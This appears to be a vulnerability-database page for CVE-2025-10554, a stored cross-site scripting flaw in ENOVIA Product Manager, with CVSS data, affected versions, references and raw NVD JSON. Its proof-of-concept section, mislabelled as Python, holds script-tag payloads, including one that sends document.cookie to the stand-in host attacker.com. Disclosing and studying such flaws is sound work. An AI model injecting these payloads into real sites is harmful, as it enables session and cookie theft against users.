CVE-2025-10554

Description

A stored Cross-site Scripting (XSS) vulnerability affecting Requirements in ENOVIA Product Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:* - VULNERABLE

3DEXPERIENCE R2023x

3DEXPERIENCE R2024x

3DEXPERIENCE R2025x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-10554 PoC - Stored XSS in ENOVIA Product Manager Requirements
// This PoC demonstrates the XSS payload injection in Requirements module

// XSS Payload - can be injected in Requirements fields
var xssPayload = '<script>alert("XSS")</script>';
var xssPayloadCookie = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>';

// Attack Scenario:
// 1. Attacker creates or edits a Requirement in ENOVIA Product Manager
// 2. Inject XSS payload in requirement name/description field
// 3. When other users view this requirement, the script executes

// Example: Creating malicious requirement via API or UI
// POST /ENOVIA/api/requirements
// {
//   "name": "Requirement Name<script>alert(document.cookie)</script>",
//   "description": "Description with XSS payload",
//   "type": "requirement"
// }

// The injected script will execute when:
// - Users browse the Requirements list
// - Users open the affected requirement detail page
// - Requirement data is displayed in reports or exports

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10554
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10554
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10554/
[4] VulDB https://vuldb.com/cve/CVE-2025-10554
[5] https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10554

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10554", "sourceIdentifier": "[email protected]", "published": "2025-11-24T16:15:46.980", "lastModified": "2026-01-12T18:50:11.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-site Scripting (XSS) vulnerability affecting Requirements in ENOVIA Product Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:*", "versionStartIncluding": "r2023x", "versionEndIncluding": "r2025x", "matchCriteriaId": "A38313EB-6DE1-4460-84B4-559F14BBCC11"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10554", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}